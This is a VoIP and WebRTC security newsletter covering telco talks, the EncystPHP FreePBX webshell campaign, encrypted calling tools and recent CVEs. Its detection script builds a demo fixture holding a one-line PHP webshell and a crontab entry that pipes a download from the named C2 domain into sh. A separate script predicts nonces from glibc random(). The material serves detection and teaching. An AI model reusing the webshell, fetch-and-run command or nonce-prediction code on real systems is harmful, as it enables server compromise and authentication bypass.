Our news
Back to breaking things in 2026
We’re back to pentesting full time in 2026. Right now we’re working
on an engagement involving media streaming based on Wowza together with
Janus for the WebRTC side, along with various API calls and many other
interesting components. The vulnerabilities we’re finding are very
specific to the software stack and the client, so we can’t disclose
much. But this is a really interesting area where media streaming and
WebRTC intersect. Protocols like HLS, RTMP and SRT are always fun to
mess with, and these systems rely heavily on the security of the APIs
they’re built on. This is clearly an undertested area in cybersecurity,
and we’re finding a lot of good stuff. We have some experience with
Janus, but it’s always fun to poke at and figure out what could go
wrong. Wowza is new territory for us though, and it’s been a great
learning experience so far.
In 2025 we did a number of VoIP pentests that almost all had the
usual suspects: RTP Bleed, RTP Inject, DoS on signaling through SIP
message flooding. Well-known issues, but clearly not well-tested. We
also covered other targets beyond SIP. HTTP is found everywhere, but
most APIs and webapps are surprisingly fragile and vulnerable to
application-layer DoS. Hardcoded secrets are still showing up in 2025
and 2026, both in desktop applications and in JavaScript exposed on the
Internet.
With that, we look forward to a year of vulnerabilities and security
fixes, infused with AI and its effects on cybersecurity!
What’s happening?
39C3 talks of interest
The 39th Chaos Communication Congress (39C3), held in December 2025,
featured some great talks touching on telco security, satellite
eavesdropping, and legacy telephony.
Learning from South Korean Telco Breaches is a must-watch for anyone working
with VoLTE and SIP. Researchers described how VoLTE implementation
weaknesses at KT (Korea Telecom) led to a major operator billing breach
through SMS and voice payload hijacking. Some of the findings
presented:
- Researchers showed SIP traffic transmitted in clear text on certain
configurations (e.g. older Xiaomi phones with Qualcomm modems had no
ciphering or integrity protection for SIP)
- The talk demonstrated encryption downgrades using SIP 401/406
responses to disable IPSec
- The South Korean TTA VoLTE standard deviated from the 3GPP spec (TS
33.203), allowing connections to proceed even when security negotiation
failed
- Femtocells gave attackers direct access to the S1 user plane in
clear text
- The talk noted that carrier profiles, including on iOS, did not
enable IPSec for IMS traffic for over a decade
Don’t look up: There are sensitive internal links in the clear on GEO
satellites (research paper: PDF) demonstrates SIP and RTP traffic broadcast in the clear over
geostationary satellite links used for cellular backhaul. Providers
strip LTE encryption at the tower and treat the satellite link as
trusted internal infrastructure, inadvertently broadcasting raw call
contents across a continental footprint. Some highlights:
- T-Mobile tower traffic in remote US regions used IPSec with a null
cipher, allowing researchers to recover full phone call audio
- Telmex traffic from Mexico included unencrypted SIP call setup and
voice data
- Researchers also observed unencrypted VoIP traffic directed at a
city with a large US Navy base
ISDN + POTS Telephony at Congress and Camp is a fun one. While the main
Congress phone infrastructure (POC) has fully migrated to VoIP, this
talk covers building a vintage ISDN and POTS network for services that
VoIP handles poorly: dial-up modems, ISDN data calls, fax, and older
protocols like BTX and Minitel. The legacy Siemens EWSD switch connects
to the VoIP world through an ISDN-to-SIP gateway called “Noodle”.
EncystPHP web shell exploits FreePBX CVE-2025-64328
FortiGuard Labs published
a report on EncystPHP, a weaponized web shell that exploits CVE-2025-64328
(post-authentication command injection in FreePBX Endpoint Manager). We
covered this CVE in the November
2025 newsletter. This report shows the vulnerability is now being
actively exploited in the wild.
The attack is attributed to INJ3CTOR3, a threat actor group that has
been targeting VoIP infrastructure for years. Check Point Research first
documented them in 2020 exploiting CVE-2019-19006 on Asterisk systems.
Their main goal is selling phone numbers, call plans, and live access to
compromised VoIP services. They moved to exploiting Elastix systems via
CVE-2021-45461 in 2021-2022. So this group is no stranger to PBX systems.
The EncystPHP webshell is quite thorough in what it does:
- Persistence: Creates a root-level user account (newfpbx), injects SSH
keys, and sets up crontab entries to re-download the payload every
minute.
- Competing malware removal: The dropper actively
hunts and removes other webshells on the system, deleting files
containing strings like “Badr”, “b3d0r”, and “pastebin”.
- Webshell deployment: Copies itself to multiple
FreePBX module directories disguised as
ajax.php, with
timestamp forgery and .htaccess URL rewriting to avoid
detection.
- PBX-aware functionality: The webshell interface
(titled “Ask Master”) includes Asterisk channel queries and SIP peer
listings alongside the usual file enumeration and command execution. It
is designed to work in both FreePBX and Elastix environments.
- C2 infrastructure: Traffic originates from Brazil (45.234.176.202),
with a C2 domain (crm.razatelefonia.pro) that appears to be a VoIP
management system frontend.
The current campaign started around December 2025 and targets FreePBX
Endpoint Manager versions 17.0.2.36 through 17.0.3.
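The behaviours listed above translate directly into host checks. The script below is an added example, not FortiGuard's, Sangoma's or FreePBX's code: it hunts for the indicators the report describes (a second UID-0 account, an every-minute download crontab, ajax.php drops with shell markers or forged timestamps under the module tree, and .htaccess rewrites into ajax.php) over a constructed FreePBX-like directory. The module path /var/www/html/admin/modules is the standard FreePBX layout; the passwd lines, the cron line (including its URL path), the PHP bodies and the PHP function-name markers (eval, base64_decode, passthru, shell_exec) are constructed or generic and do not come from the report.

```python
import os
import re
import tempfile
import time

# "Ask Master" is the page title quoted in the report; the PHP function
# names are generic webshell markers added here, not taken from the report.
SHELL_MARKERS = (b"Ask Master", b"eval(", b"base64_decode(", b"passthru(", b"shell_exec(")
# C2 indicators quoted in the report.
C2_INDICATORS = ("45.234.176.202", "crm.razatelefonia.pro")
EVERY_MINUTE_RE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s")
FETCH_RE = re.compile(r"\b(curl|wget)\b")


def uid0_accounts(passwd_text):
    """Account names other than root that carry UID 0 (root-level backdoor users)."""
    hits = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) >= 3 and parts[2] == "0" and parts[0] != "root":
            hits.append(parts[0])
    return hits


def suspicious_cron(cron_text):
    """Every-minute entries that fetch something, plus any line naming a C2 indicator."""
    hits = []
    for line in cron_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fetch_loop = EVERY_MINUTE_RE.match(line) and FETCH_RE.search(line)
        if fetch_loop or any(ioc in line for ioc in C2_INDICATORS):
            hits.append(line)
    return hits


def suspicious_ajax_php(modules_dir, max_skew=86400):
    """ajax.php files under the module tree with shell markers or a forged mtime.

    touch -r copies another file's mtime, but ctime is set by the kernel when
    the inode changes, so an mtime far older than ctime is the forgery tell.
    The file name alone is not a signal; only content or timestamps flag it."""
    hits = []
    for root, _dirs, files in os.walk(modules_dir):
        if "ajax.php" not in files:
            continue
        path = os.path.join(root, "ajax.php")
        with open(path, "rb") as fh:
            body = fh.read()
        st = os.stat(path)
        reasons = [m.decode() for m in SHELL_MARKERS if m in body]
        if st.st_ctime - st.st_mtime > max_skew:
            reasons.append("mtime %.0fs older than ctime" % (st.st_ctime - st.st_mtime))
        if reasons:
            hits.append((os.path.relpath(path, modules_dir), reasons))
    return sorted(hits)


def htaccess_rewrites(modules_dir):
    """.htaccess files that rewrite requests into an ajax.php."""
    hits = []
    for root, _dirs, files in os.walk(modules_dir):
        if ".htaccess" not in files:
            continue
        path = os.path.join(root, ".htaccess")
        with open(path) as fh:
            if re.search(r"RewriteRule\s+\S+\s+\S*ajax\.php", fh.read()):
                hits.append(os.path.relpath(path, modules_dir))
    return sorted(hits)


def hunt(passwd_text, cron_text, modules_dir):
    return {
        "uid0": uid0_accounts(passwd_text),
        "cron": suspicious_cron(cron_text),
        "ajax": suspicious_ajax_php(modules_dir),
        "htaccess": htaccess_rewrites(modules_dir),
    }


def build_demo_host():
    """Constructed FreePBX-like tree: one infected module directory, one clean one."""
    base = tempfile.mkdtemp(prefix="fpbx-demo-")
    modules = os.path.join(base, "var/www/html/admin/modules")
    os.makedirs(os.path.join(modules, "core"))
    os.makedirs(os.path.join(modules, "dashboard"))
    # Infected drop: constructed shell body, mtime pushed a year into the past.
    shell = os.path.join(modules, "core", "ajax.php")
    with open(shell, "wb") as fh:
        fh.write(b"<?php /* Ask Master */ eval(base64_decode($_POST['c'])); ?>")
    old = time.time() - 365 * 86400
    os.utime(shell, (old, old))
    with open(os.path.join(modules, "core", ".htaccess"), "w") as fh:
        fh.write("RewriteEngine On\nRewriteRule ^api/(.*)$ ajax.php?x=$1 [L]\n")
    # Clean file that happens to be called ajax.php: fresh mtime, no markers, not flagged.
    with open(os.path.join(modules, "dashboard", "ajax.php"), "w") as fh:
        fh.write("<?php echo json_encode(['ok' => true]); ?>")
    passwd = ("root:x:0:0:root:/root:/bin/bash\n"
              "asterisk:x:1000:1000::/var/lib/asterisk:/sbin/nologin\n"
              "newfpbx:x:0:0::/root:/bin/bash\n")
    # Constructed crontab; the URL path is invented for the demo.
    cron = ("0 3 * * * /usr/sbin/fwconsole reload\n"
            "* * * * * curl -s http://crm.razatelefonia.pro/p | sh\n")
    return passwd, cron, modules


if __name__ == "__main__":
    for key, value in hunt(*build_demo_host()).items():
        print(key, value)
```

On a real host, feed it /etc/passwd, the output of `crontab -l` for root and the asterisk user, and the module directory; the timestamp check relies on ctime, so run it on the live filesystem rather than on a copy, since copying resets ctime.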
This month we take a look at two browser-based, privacy-focused tools
for voice and video communication built on WebRTC. Element Call has been
in the works for a while and shipped as the default call experience in
Element X back in September
2024, but a detailed architecture
talk at Matrix Conference 2025 gave us a closer look at the security
and privacy design. Magicall, on the other hand, is a brand new entrant
from a cryptography consultancy. Both promise End-to-End Encryption
(E2EE) and various privacy features. Note that we have not tested the
security of these tools ourselves. This is a quick review based on what
these projects claim to offer, to give you an idea of what’s happening
in this space.
Element Call
Element Call is a federated real-time communication platform built on the
Matrix protocol. At Enable Security we are fans of the
Matrix protocol and their vision, so we’re glad to see them finally
moving away from third-party conferencing systems (e.g., Jitsi in the
past) to a native solution tied to the rest of the platform. They still
rely on third-party software (LiveKit SFU), but this is now tightly
integrated. Such changes help significantly in reducing the gap between
user expectations of security and privacy versus reality.
Here is a summary of the security and privacy features that make
MatrixRTC attractive:
- True end-to-end encryption (E2EE): MatrixRTC uses
“Insertable Streams” (frame-level encryption) to encrypt media on the
client device before it reaches the network. This ensures the server
(SFU) forwards opaque packets and cannot decrypt or view the content,
even while managing bandwidth.
- Sovereign multi-SFU architecture: Unlike
centralized platforms, MatrixRTC allows a multi-SFU setup where
participants publish media to their own homeserver’s SFU. This
ensures users keep control of their media upload path and data remains
within their trusted infrastructure.
- Metadata sovereignty: Users choose where their
metadata resides (on their self-hosted or chosen homeserver) rather than
exposing interaction data to a single centralized vendor.
- Granular access control: The system strictly
enforces Matrix room permissions, distinguishing between “full-access”
users (who can publish media) and “restricted” users. This prevents
unauthorized participants from consuming server resources or injecting
media into the call.
- “Invisible” cryptography: The framework is moving
to exclude non-cross-signed devices entirely, ensuring that only
verified, trusted devices can participate in encrypted calls,
eliminating the risk of unverified eavesdroppers.
- Traffic obfuscation: Support for
TURN-TLS allows RTC traffic over TLS on port 443,
helping it blend with typical HTTPS/TLS egress and traverse restrictive
firewalls.
Status: Actively developed as the next-generation
conferencing solution for the Matrix ecosystem.
Magicall
Magicall is a brand new
browser-based, end-to-end encrypted video calling service built by
Symbolic Software, a Paris-based cryptography
consultancy. It operates on a “zero friction” model, requiring no
accounts for guests and no software downloads.
The key security and privacy features include:
- True end-to-end encryption (E2EE): All video,
audio, and chat are encrypted directly in the browser using AES-256-GCM
(SFrame) before they ever reach the network.
- Zero-knowledge architecture: Servers act as “dumb
relays” that route encrypted blobs; they cannot decrypt your calls or
read your messages.
- Anti-tamper verification: “Short Authentication Strings” (SAS) let
participants verify each other via a 4-word code; if the codes compared
out of band do not match, a Man-in-the-Middle (MITM) on the key exchange
is detected. The check only helps if participants actually compare the
codes.
- Strict privacy guarantees: The service promises no
AI training on your calls, no ads, and no selling of user data.
- EU jurisdiction & GDPR: Symbolic Software, a
French company, built and hosts the platform in the EU, with full GDPR
compliance by default.
- Cryptography background: The team has a track
record in applied cryptography and has participated in public security
reviews (e.g., 1Password’s cryptography review with Cure53).
- Double layer protection: Media is protected by two
layers of encryption: E2E (SFrame) plus standard WebRTC transport
encryption (SRTP).
Trust Model: Users must trust that the server delivers
unmodified JavaScript (a compromised or coerced server could ship a
client that leaks keys); the design also relies on the integrity of the
browser’s WebCrypto and RTCRtpScriptTransform implementations.
Status: Alpha (as of January 2026). Supports up to
256 participants in the Pro tier.
Phone phreaking, social engineering in the age of voice AI and voice biometrics
Skyler Tuter, a security consultant from TrustedSec,
gave a presentation at
Wild West Hackin’ Fest in Deadwood, South Dakota. The talk, “Exploiting
AI: A Case Study on Voice Biometric Penetration Testing”, covers
AI-driven voice cloning against both IVR systems and
human help desk agents.
The first case study details the compromise of a bank’s Interactive
Voice Response (IVR) system, where 8 out of 9 test accounts were
accessed by bypassing voice print verification. The second demonstrates
impersonation of a corporate CIO, leading a help desk agent to reset
administrator account passwords within a two-minute phone call.
I found it quite entertaining as it involves caller ID spoofing (with
Zoiper), bypassing biometric matching by using AI voice cloning from
ElevenLabs, no multi-attempt lockout policy and a pinch of social
engineering. The presentation doesn’t go into the telephony setup
details, but they likely interfaced with the target bank through SIP or
used a phone provider that allowed spoofed caller IDs for PSTN. That
side of the attack chain would have been interesting to hear more
about.
What makes this relevant for our audience is that the VoIP and
telephony layer is the enabler for these attacks. Caller ID spoofing via
SIP, the ability to programmatically place calls, and the lack of
authentication at the network level are what make AI voice cloning
practical. As voice biometrics become more common in banking and
enterprise environments, the telephony infrastructure that VoIP/UC
engineers build and maintain becomes a direct part of the attack
surface. If you’re running voice systems that rely on caller ID or voice
biometrics for any form of trust, this talk is worth watching.
Yealink RPS vulnerability finally gets a CVE
Yealink has published a security
bulletin acknowledging CVE-2025-68644
(CVSS 7.4), an unauthorized information disclosure vulnerability in
their Redirect and Provisioning Service (RPS). If you’ve been following
our coverage, this is the same issue that researchers Jeroen Hermans and
Stefan Gloor have been disclosing since mid-2025.
We first covered this in the June
2025 newsletter when the researchers published on Full Disclosure,
and again in August
2025 when they presented at the WHY 2025 hacker camp. At the time,
Yealink’s own advisories downplayed the severity and lacked detail. The
researchers disagreed, pointing out that the CA private key shipped with
every phone allowed attackers to access provisioning data (including SIP
credentials) for any Yealink device worldwide.
Now, months later, Yealink has assigned CVE-2025-68644 and published
a third-party
verification report by NetSPI confirming the remediation. According
to the bulletin, RPS instances before 2025-06-27 were affected, and the
fix was applied cloud-side through an enhanced authentication
mechanism.
Timeline
- 2025-05-19: Researchers report the issue to
Yealink.
- 2025-06-20/21: Public disclosure on Full Disclosure
mailing list.
- 2025-06-27: Yealink claims the issue was fixed
cloud-side. RPS instances before this date were affected.
- 2025-08-11/12: Research presented publicly at WHY
2025 (CCC ecosystem).
- 2025-09-19: NetSPI remediation testing date (per
report).
- 2025-09-29: NetSPI report date (per report).
- 2025-11-27: Yealink publishes the Trust Center
bulletin and acknowledges CVE-2025-68644.
- 2025-12-21: Earliest archive.org capture of both
the bulletin page and the NetSPI PDF.
It took over six months from initial disclosure to a formal CVE
acknowledgement. The timeline is worth noting for anyone dealing with
Yealink vulnerability disclosures in the future.
Security Updates and Vulnerability News Round-Up
An actively exploited remote code execution vulnerability (CVE-2026-20045,
CVSS 8.2) affects Cisco Unified Communications Manager, UCM SME, IM
& Presence Service, Unity Connection, and Webex Calling Dedicated
Instance. Cisco PSIRT reports attempted exploitation in the wild and
broad scanning for exposed interfaces, and CISA added it to the KEV
catalog. Cisco lists 14SU5 as the first fixed release for 14.x and 15SU4
(scheduled March 2026) as the first fixed release for 15.x; COP patch
files exist for certain interim SU releases, and 12.5 must migrate to a
fixed release.
A critical command injection vulnerability (CVE-2026-22844,
CVSS 9.9) in Zoom Node Multimedia Routers (MMR) allows authenticated
meeting participants to execute arbitrary code remotely. Affects Zoom
Node Meetings Hybrid and Meeting Connector versions before 5.2.1716.0.
This could enable compromise of multimedia routing infrastructure.
Upgrade to MMR version 5.2.1716.0 or later.
Two zero-day vulnerabilities in the ALGO 8180 IP Audio Alerter allow
unauthenticated remote code execution via crafted SIP traffic. CVE-2026-0792
is a stack-based buffer overflow triggered through a crafted SIP INVITE
Alert-Info header, and CVE-2026-0794
is a use-after-free in SIP call handling. Discovered by Vera Mens at
Claroty Research (Team82) and published via ZDI. No patches available;
ZDI recommends restricting SIP exposure and network isolation.
A critical authentication bypass (CVE-2025-67822)
in the Provisioning Manager of Mitel MiVoice MX-ONE affects versions
7.3.0.0.50 through 7.8.1.0.14. The vulnerability allows unauthorized
access to admin accounts.
Rapid7 released a Metasploit
module that leverages the FreePBX “Rabbit Hole” issues to perform an
unauthenticated SQL injection and create a new FreePBX administrative
user (CVE-2025-66039
and CVE-2025-61675).
We covered these vulnerabilities in the December
2025 edition.
A cryptographic weakness (CVE-2025-69217,
CVSS 7.7) affects coturn versions 4.6.2r5 through 4.7.0-r4: a 2023
commit replaced OpenSSL’s RAND_bytes with the libc
random() function, a deterministic non-cryptographic generator
whose internal state can be recovered from its outputs. An attacker
observing roughly 50 sequential nonces can reconstruct the RNG state,
predict future nonces and relay port allocations, and send authenticated
TURN requests from spoofed IPs (if credentials are known). Reported by
Mathy Vanhoef and jornlp. Upgrade to 4.8.0 or later.
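To see why swapping RAND_bytes for random() breaks nonce unpredictability, the following added example (not coturn's code, and not the reporters' proof of concept) reimplements glibc's default random() generator in pure Python and plays the observer: after recording 31 consecutive "nonces" from a server seeded with an unknown value, it names each following nonce up to a single carry bit, with no knowledge of the seed. The nonce format (one 31-bit random() output rendered as eight hex digits) is a simplification assumed for the demo; coturn's real nonce construction is not reproduced, and random() on non-glibc libcs is a different generator.

```python
MASK32 = 0xFFFFFFFF
MOD31 = 1 << 31


def glibc_random(seed):
    """Yield the outputs of glibc srandom(seed); random(); random(); ...

    glibc's default generator (TYPE_3) keeps a 31-word table updated as
    r[i] = r[i-31] + r[i-3] mod 2^32 and returns r[i] >> 1.  The table is
    seeded by a Park-Miller LCG and cycled 310 times before the first output.
    Seeds are limited to 1..2^31-1 so Python's modulo matches C's Schrage step."""
    if not 1 <= seed < 2 ** 31:
        raise ValueError("seed must be in 1..2^31-1 for this reimplementation")
    r = [seed]
    for i in range(1, 31):
        r.append((16807 * r[i - 1]) % 2147483647)
    r.extend(r[:3])                      # r[31..33] duplicate r[0..2]
    for i in range(34, 344):             # 310 discarded outputs
        r.append((r[i - 31] + r[i - 3]) & MASK32)
    i = 344
    while True:
        r.append((r[i - 31] + r[i - 3]) & MASK32)
        yield r[i] >> 1
        i += 1


def predict_next(observed):
    """Two candidates for the next output, given at least 31 consecutive outputs.

    Each output drops the low bit of its table word, so the carry from adding
    the two hidden low bits is unknown: the truth is base (about 75% of the
    time) or base + 1 (mod 2^31).  No seed recovery is needed at all."""
    if len(observed) < 31:
        raise ValueError("need 31 consecutive outputs")
    base = (observed[-31] + observed[-3]) % MOD31
    return base, (base + 1) % MOD31


def nonce(output):
    """Assumed nonce format for the demo: one random() output as 8 hex digits."""
    return "%08x" % output


def replay_attack(seed, observed_count=31, predicted_count=50):
    """Observer collects nonces from a server seeded with `seed`, then predicts.

    Returns (how many true nonces fell in the 2-candidate set, how many matched
    the first candidate exactly)."""
    gen = glibc_random(seed)
    seen = [int(nonce(next(gen)), 16) for _ in range(observed_count)]
    contained = exact = 0
    for _ in range(predicted_count):
        candidates = predict_next(seen)
        actual = next(gen)              # what the server hands out next
        contained += actual in candidates
        exact += actual == candidates[0]
        seen.append(actual)             # the observer learns each nonce as it is used
    return contained, exact


if __name__ == "__main__":
    contained, exact = replay_attack(seed=20250101)
    print("in candidate set: %d/50, exact on first guess: %d/50" % (contained, exact))
```

With one output per nonce, 31 observed nonces are enough; the report's figure of roughly 50 presumably reflects coturn's actual nonce construction, which consumes the generator differently than this model. The structural point carries over unchanged: anything derived from random() is a function of 31 earlier outputs, which is why the fix restores a CSPRNG rather than reseeding more often.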
A high-severity elevation of privilege vulnerability (CVE-2026-20931,
CVSS 8.0) in Windows Telephony Service (TAPISRV) allows an
authorized attacker to elevate privileges over an adjacent network by
exploiting external control of file name or path. Patched in the January
2026 Patch Tuesday.
Pexip Infinity v39 fixes multiple WebRTC-related denial of service
issues. A crafted media stream can trigger a controlled abort in media
processing (CVE-2025-66379),
crafted signalling can cause a temporary DoS when “Direct Media for
WebRTC” is enabled (CVE-2025-66443),
and insufficient access control in RTMP allows attackers to disconnect
streams traversing a Proxy Node (CVE-2025-66378).
Upgrade to v39.
A dialplan injection vulnerability (CVE-2025-69205,
CVSS 6.3) in the Asterisk federation feature of µURU allows injection of
special characters into the Dial() application through
improper input validation on federation names. This enables unauthorized
call redirection and potential toll fraud. Reported by Moritz Wörmann and patched in a commit.
Staff at Kensington and Chelsea, Westminster City, and Hammersmith
and Fulham councils were targeted
through Microsoft Teams with follow-on social engineering
(unexpected calls and meeting invitations) after a breach in late 2025.
Teams continues to be a first-class phishing and initial-access
surface.
Starting January 12, 2026, Microsoft Teams automatically
enables messaging safety features by default, including file type
protection, malicious URL detection, and user reporting. Applies to
tenants using default safety configurations. Worth noting that these
defaults protect internal tenant messaging but don’t address the
cross-tenant guest access architecture issue where users lose home
organization Defender protections when joining external tenants.
A medium severity vulnerability (CVE-2025-20335,
CVSS 5.3) in Cisco Desk Phone 9800, IP Phone 7800/8800, and Video Phone
8875 allows unauthenticated remote attackers to write arbitrary files
through inadequate directory permission controls. Requires Web Access to
be enabled (disabled by default).
An information disclosure vulnerability (CVE-2025-20336)
in the same Cisco phone models (Desk Phone 9800, IP Phone 7800/8800,
Video Phone 8875) allows unauthenticated remote attackers to access
sensitive data. Also requires Web Access to be enabled.
A SIP-based denial of service vulnerability (CVE-2025-15542,
CVSS 6.3) in TP-Link VX800v v1.0 allows unauthenticated attackers to
flood the device with crafted INVITE messages, blocking all incoming
voice calls. Fixed in firmware 800.0.12 (Build 250912).